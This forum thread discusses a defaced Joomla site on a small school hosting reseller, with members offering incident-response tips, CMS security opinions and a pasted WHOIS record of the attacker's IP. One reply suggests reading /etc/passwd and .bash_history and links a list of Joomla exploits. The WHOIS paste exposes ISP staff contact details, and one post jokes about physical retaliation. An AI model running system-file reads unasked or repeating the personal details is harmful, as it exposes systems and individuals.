Jump to content

Photo

My Website Just Got Hacked!

* * * * * 1 votes

  • Please log in to reply
31 replies to this topic

#1
VladCazan

VladCazan
  • Members
  • 32 posts
  • Joined: 08-March 10
  • LocationToronto, Ontario
  • Expertise:HTML, CSS, PHP, Java, Javascript, SQL, Flash
I run a small, very small hosting company for my school. I basically just bought some reseller hosting and I create new shared cpanel hosting packages, this is for very simple HTML/CSS learning or for word-press blogs. The front end of the website runs off of the Joolma! CMS, and this morning it was hacked with a custom screen.

Posted Image

Does anyone know what I should be doing after this happens? , I took the site offline, it seems they only got to Joomla, not WHMCS or cpanel, or whm so its probably on the joomla side. I've changed passwords, made backups is there anything else?

#2
iPhone

iPhone
  • Members
  • 50 posts
  • Joined: 08-March 10
  • LocationMaldives
  • Expertise:HTML, CSS, PHP, Graphics, Flash
make a custom php site with css...
no need of joomla XD

#3
BlaDe

BlaDe
  • Members
  • 3 posts
  • Joined: 08-March 10

I run a small, very small hosting company for my school. I basically just bought some reseller hosting and I create new shared cpanel hosting packages, this is for very simple HTML/CSS learning or for word-press blogs. The front end of the website runs off of the Joolma! CMS, and this morning it was hacked with a custom screen.

..

Does anyone know what I should be doing after this happens? , I took the site offline, it seems they only got to Joomla, not WHMCS or cpanel, or whm so its probably on the joomla side. I've changed passwords, made backups is there anything else?



Do you keep access logs? (Apache stores them by default). Ensure you have the latest Joomla as you're right it's likely this which compromised your system.

#4
Necrotex

Necrotex
  • Members
  • 43 posts
  • Joined: 08-March 10
  • LocationCologne - Germany
  • Expertise:HTML, CSS, PHP, Javascript, Python, SQL
Take a look through all logs that are related with the site (webserver, databse etc). Try to find out how they got you and then close the hole ^^
Also look for the .bash_history file for any commands you can't remember and make sure there there are no new users (cat /etc/passwd or somithing like that ^^). But thats the worst case.

--Necro

#5
JackHarley

JackHarley

    Jack

  • Members
  • 1275 posts
  • Joined: 08-March 10
  • LocationIreland
  • Expertise:HTML, CSS, PHP, Javascript, SQL
I'm guessing this is an auto attack, done by bots which scour the internet looking for vulnerable targets.

Check your file permissions, make sure no folder is 0777 unless it ABSOLUTELY has to be.


#6
VladCazan

VladCazan
  • Members
  • 32 posts
  • Joined: 08-March 10
  • LocationToronto, Ontario
  • Expertise:HTML, CSS, PHP, Java, Javascript, SQL, Flash
Yes, I have raw access logs for cpanel, but I dont think Joomla does the same. It'll take a little investigating to see if they did get into cpanel, then I have a larger problem.

But I think iPhone is right....it was just a joomla template with an Iframe loading in whmcs, made it look pretty, but im sure I can do the same with one little page and lose the whole SQL database.

Thanks nercotex, I checked no new user was created BUT they changed my super admin password, but thats just encoded though MD5, I can just create a new account and then delete the old one. Its so strange as Joomla was up to date.

#7
NinjaLikesCheez

NinjaLikesCheez
  • Members
  • 18 posts
  • Joined: 08-March 10
  • Expertise:HTML, CSS
I like how they put copyrightrd, like hacking is a copyrightable topic :P

Well I hope they didn't fuck anything up.
Hello webdevrefinery!

#8
VladCazan

VladCazan
  • Members
  • 32 posts
  • Joined: 08-March 10
  • LocationToronto, Ontario
  • Expertise:HTML, CSS, PHP, Java, Javascript, SQL, Flash
Haha yeah a friend noticed that too, pretty funny, like im going to steal their name after they hacked me lol,

Everything was fine, im just working on a custom html page to put up while I access the damage.

#9
Traffic

Traffic
  • Members
  • 22 posts
  • Joined: 08-March 10
  • Expertise:HTML, PHP, Java, Javascript, SQL
I've just Googled 'UAH-CREW' and they've hacked a lot of sites! but must likely Joomla's CMS

So be careful!
Traffic
Mobile Traffic News

#10
Olli

Olli

    Veteran.

  • Members
  • 685 posts
  • Joined: 08-March 10
  • LocationEngland, Manchester
  • Expertise:HTML, CSS, Graphics
They have hacked loads of other sites including one owned by the government.

check it out [Here]

Steam : Ollibreh



if you want to achieve greatness stop asking for permission


#11
Traffic

Traffic
  • Members
  • 22 posts
  • Joined: 08-March 10
  • Expertise:HTML, PHP, Java, Javascript, SQL
But how can they do it??

I own a couple of Joomla based sites, and I think it's a little scary knowing this!

I know I shouldn't use CMS, but I had no time and I needed the sites on-line :P

Edit: I've just checked my sites and they are ok uff!
Traffic
Mobile Traffic News

#12
Necrotex

Necrotex
  • Members
  • 43 posts
  • Joined: 08-March 10
  • LocationCologne - Germany
  • Expertise:HTML, CSS, PHP, Javascript, Python, SQL
Well, mostly they used a SQL injection or a remote file inclusion (if you don't know what this is google it ;)). If your systems (the Joomla CMS) are up to date, the chances that this is possible there are very low. But to check if you're secure heres a list of current Joomla flaws: http://www.exploit-db.com/papers/11629

- Necro

#13
Dissident

Dissident
  • Members
  • 144 posts
  • Joined: 08-March 10

But how can they do it??

I own a couple of Joomla based sites, and I think it's a little scary knowing this!

I know I shouldn't use CMS, but I had no time and I needed the sites on-line :P

Edit: I've just checked my sites and they are ok uff!


Joomla is awful. And I mean awful. Consider something else if you are looking for security.

#14
VladCazan

VladCazan
  • Members
  • 32 posts
  • Joined: 08-March 10
  • LocationToronto, Ontario
  • Expertise:HTML, CSS, PHP, Java, Javascript, SQL, Flash
What do you guys suggest, what should I use for my CMS, i mean everyone loves to code from skratch, but sometimes there is no time for that......

...BTW nothing on my SQL database was hacked.......only the template..I changed my template and everything was fine, so /temples folder is going back to 755?

#15
VladCazan

VladCazan
  • Members
  • 32 posts
  • Joined: 08-March 10
  • LocationToronto, Ontario
  • Expertise:HTML, CSS, PHP, Java, Javascript, SQL, Flash
Finally!!! I found the I.P address of the hacker and I have found exactly what he did. He just changed the index.html file from my template to the red font and such. Very easy fix, very anoying!

So please add this I.P to the banned list on your server and save yourself some trouble.

IP : 79.106.109.44
Country : Albania

NetRange:   79.0.0.0 - 79.255.255.255 
CIDR:       79.0.0.0/8 
NetName:    79-RIPE
NetHandle:  NET-79-0-0-0-1
Parent:     
NetType:    Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: TINNIE.ARIN.NET
NameServer: SUNIC.SUNET.SE
NameServer: NS2.LACNIC.NET
Comment:    These addresses have been further assigned to users in
Comment:    the RIPE NCC region. Contact information can be found in
Comment:    the RIPE database at http://www.ripe.net/whois
RegDate:    2006-08-29
Updated:    2009-05-18
 
# ARIN WHOIS database, last updated 2010-03-07 20:00
# Enter ? for additional hints on searching ARIN's WHOIS database.
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at https://www.arin.net/whois_tou.html
 
 
 
Deferred to specific whois server: whois.ripe.net...
 
 
% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf
 
% Note: This output has been filtered.
%       To receive output for a database update, use the "-B" flag.
 
% Information related to '79.106.0.0 - 79.106.255.255'
 
inetnum:        79.106.0.0 - 79.106.255.255
org:            ORG-AS1-RIPE
netname:        al-atnet-20071123
descr:          Albtelecom Sh.a.
country:        AL
admin-c:        VT846-RIPE
tech-c:         HH846-RIPE
status:         ALLOCATED PA
mnt-by:         RIPE-NCC-HM-MNT
mnt-lower:      ALBTELECOM-MNT
mnt-routes:     ALBTELECOM-MNT
source:         RIPE # Filtered
 
organisation:   ORG-AS1-RIPE
org-name:       Albtelecom Sh.a.
org-type:       LIR
address:        ALBTELECOM Sh.a
                Rr "M.Shyri" N42
                Tirane
                Albania
phone:          +355 4 2232200
fax-no:         +355 4 2232200
e-mail:         h.hoxha@atnet.al
admin-c:        HH846-RIPE
admin-c:        VT846-RIPE
mnt-ref:        ALBTELECOM-MNT
mnt-ref:        RIPE-NCC-HM-MNT
mnt-by:         RIPE-NCC-HM-MNT
source:         RIPE # Filtered
 
person:         Vilma Tomco
address:        Albtelecom Sh.a.
phone:          +355 4 2232200
fax-no:         +355 4 2232200
e-mail:         vilma.tomco@albtelecom.al
nic-hdl:        VT846-RIPE
source:         RIPE # Filtered
 
person:         Hysen Hoxha
address:        Albtelekom Sh.a.
phone:          +355 4 2375641
fax-no:         +355 4 2375641
e-mail:         hhoxha@atnet.al
nic-hdl:        hh846-RIPE
source:         RIPE # Filtered
remarks:
 
% Information related to '79.106.109.0/24AS42313'
 
route:          79.106.109.0/24
descr:          BGP-ADVERT-ALBTELCO
origin:         AS42313
mnt-by:         ALBTELECOM-MNT
source:         RIPE # Filtered


#16
Dissident

Dissident
  • Members
  • 144 posts
  • Joined: 08-March 10
lol, you did an ARIN whois on an IP allocated to RIPE. Use this.

#17
VladCazan

VladCazan
  • Members
  • 32 posts
  • Joined: 08-March 10
  • LocationToronto, Ontario
  • Expertise:HTML, CSS, PHP, Java, Javascript, SQL, Flash

lol, you did an ARIN whois on an IP allocated to RIPE. Use this.

Thanks, now who wants to go to albania and smack this 15 year old in the face.

#18
Traffic

Traffic
  • Members
  • 22 posts
  • Joined: 08-March 10
  • Expertise:HTML, PHP, Java, Javascript, SQL

Joomla is awful. And I mean awful. Consider something else if you are looking for security.


I didn't know that, now I'm a little scared

What do you guys suggest, what should I use for my CMS, i mean everyone loves to code from skratch, but sometimes there is no time for that......


Like VladCazan said, sometimes there is no time.

Which CMS do you recommend us?
Traffic
Mobile Traffic News

#19
Dissident

Dissident
  • Members
  • 144 posts
  • Joined: 08-March 10
Honestly, I can't recommend any. I simply have never ran a CMS on a website that I hadn't coded myself. The basics: if it's a large project with tons of developers, it is typically vulnerable beyond all belief.

#20
Parsa

Parsa
  • Members
  • 6 posts
  • Joined: 08-March 10
If you are going to use an open source I would say the top two in terms of security are drupal (PHP) and Alfresco (Java).




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users